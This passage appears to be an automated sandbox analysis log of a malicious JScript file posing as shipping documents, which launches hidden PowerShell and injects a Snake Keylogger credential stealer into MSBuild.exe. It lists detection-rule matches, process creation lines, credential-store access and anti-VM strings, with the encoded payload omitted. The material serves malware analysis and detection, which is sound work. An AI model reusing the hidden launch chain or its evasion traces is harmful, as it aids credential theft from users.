                      Source: powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.244.56.186d
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.244.56.186l
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
                      Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49686
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
                      Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
                      Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
                      Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49686 -> 443
                      Source: unknown HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49686 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.6:49693 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.6:49694 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49695 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode

                      System Summary

                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Shipping Documents SI 694_pdf.js Static file information: Suspicious name
                      Source: C:\Windows\System32\wscript.exe COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}
                      Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '...' -replace '','';$al
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A972E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026BC530
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026B2DD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026B9480
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026B19B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026BC521
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_026B946F
                      Source: Shipping Documents SI 694_pdf.js Initial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3066
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, COVIDPickers.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@6/3@7/5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vi3ritig.bym.ps1
                      Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: MSBuild.exe, 0000000C.00000002.2507426885.0000000002916000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002923000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2511131331.000000000382D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Shipping Documents SI 694_pdf.js ReversingLabs: Detection: 13%
                      Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '...' -replace '','';$al
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, msxml3.dll, winhttpcom.dll, winhttp.dll, ondemandconnroutehelper.dll, mlang.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, urlmon.dll, srvcli.dll, netutils.dll, wininet.dll, windows.storage.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, gpapi.dll, mpr.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");isolationist.Run(Rabelaisian, 0, false); [obfuscated JScript omitted]
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '[Base64-encoded command omitted]' -replace '','';$al
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A635D pushad ; iretd 10_2_00007FF88A8A6391
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A5964 pushad ; ret 10_2_00007FF88A8A5969
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A62A2 push eax; retf 10_2_00007FF88A8A6291
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A62A2 pushad ; iretd 10_2_00007FF88A8A6391
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A6241 push eax; retf 10_2_00007FF88A8A6291
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A00BD pushad ; iretd 10_2_00007FF88A8A00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF88A8A7563 push ebx; iretd 10_2_00007FF88A8A756A
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2650000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4800000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5803
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4021
                      Source: C:\Windows\System32\wscript.exe TID: 6460 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -10145709240540247s >= -30000s
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !vmware virtual s scsi disk device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga
                      Source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 